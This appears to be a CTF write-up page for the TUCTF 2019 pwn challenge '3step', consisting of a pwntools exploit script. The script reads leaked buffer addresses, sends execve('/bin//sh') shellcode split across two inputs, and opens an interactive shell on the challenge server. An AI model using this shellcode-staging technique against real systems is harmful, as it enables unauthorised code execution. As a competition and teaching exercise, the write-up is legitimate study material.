Tags: tuctf 

Rating:

#!/usr/bin/env python2
'''
    author : tripoloski 
    visit  : https://tripoloski1337.github.io/
    mail   : arsalan.dp@gmail.com
    generated by skeloski GEF
'''
import sys
from pwn import *
# pwntools target description: 32-bit little-endian Linux, default verbosity.
context.update(
    arch="i386",
    endian="little",
    os="linux",
    log_level="info",
)
# Run-mode flags; the __main__ block flips exactly one of them before exploit().
LOCAL = False
REMOTE = False
# Absolute path of the challenge binary in the author's checkout.
TARGET = os.path.realpath("/home/tripoloski/code/ctf/tuCTF-2019/pwn/3step/3step")
elf = ELF(TARGET)

def attach(r):
    """Attach gdb to the process *r* when running locally; no-op otherwise.

    ``bkps`` is empty as written, so gdb is attached with no breakpoints;
    symbol names appended to it become ``break <name>`` commands.
    """
    if not LOCAL:
        return
    bkps = []
    gdb_script = "\n".join("break %s" % (name,) for name in bkps)
    gdb.attach(r, gdb_script)

def exploit(r):
    """Drive the three-prompt service over tube *r* and hand over the session.

    The service prints two addresses after the line ending in "snacks\\n";
    this reads them, assembles two short code fragments, answers the three
    "Step N:" prompts with them, then drops into ``r.interactive()``.

    Mitigation note (for anyone auditing a similar service): the whole
    flow depends on the program disclosing buffer addresses on stdout and
    on those buffers being reachable by a jump, i.e. executable. Not
    printing internal addresses and marking data memory non-executable
    (NX) removes both preconditions.
    """
    #attach(r)
    r.recvuntil("snacks\n")
    # Each address is consumed as exactly 10 bytes ("0x" + 8 hex digits);
    # a differently formatted print would make int(..., 16) fail.
    buf = int(r.recv(10) , 16)
    r.recvuntil("\n")
    buf1= int(r.recv(10) , 16)

    # source exploit: http://shell-storm.org/shellcode/files/shellcode-752.php
    # xor ecx, ecx
    # mul ecx
    # push ecx
    # push 0x68732f2f   
    # push 0x6e69622f   
    # mov ebx, esp
    # mov al, 11
    # int 0x80

    # exploit stage 1
    # The reference sequence above is split across two inputs. Stage 1 ends
    # with `jmp edi`, where edi was loaded with buf1 (the second address the
    # service printed), so stage 2 must land at buf1 for the jump to continue
    # the sequence. The two pushed constants are the ASCII bytes of "//sh"
    # and "/bin".
    p = asm(''' 
        xor ecx, ecx
        mul ecx
        push ecx
        push 0x68732f2f   
        mov edi, '''+ hex(buf1) +'''   
        jmp edi
    ''' )

    # exploit stage 2: remainder of the reference sequence, entered via the
    # jmp at the end of stage 1.
    p2 = asm('''
        push 0x6e69622f
        mov ebx, esp
        mov al, 11
        int 0x80        
        ''')

    # Fragment sizes, printed so they can be checked against the per-step
    # input budget of the binary.
    print(len(p))
    print(len(p2))

    # NOTE(review): the trailing "18" / "16" annotations presumably record the
    # byte budget of each step's buffer — confirm against the binary.
    log.info("buffer  : " + hex(buf) ) # 18
    log.info("buffer1 : " + hex(buf1) )# 16

    r.sendlineafter("Step 1:",p)
    r.sendlineafter("Step 2:",p2)
    # Step 3 receives the first printed address as a packed 32-bit value;
    # presumably the binary transfers control to it — verify in the disassembly.
    r.sendlineafter("Step 3:",p32(buf))

    r.interactive()
    return

if __name__ == "__main__":
    # "remote" as the only argument targets the challenge server; any other
    # invocation runs the local binary under pwntools.
    use_remote = len(sys.argv) == 2 and sys.argv[1] == "remote"
    if use_remote:
        REMOTE = True
        r = remote("chal.tuctf.com", 30504)
    else:
        LOCAL = True
        r = process([TARGET,])
    exploit(r)
    sys.exit(0)

Original writeup (https://github.com/tripoloski1337/writeup-ctf/blob/master/tuCTF-2019/pwn/3step/exploit.py).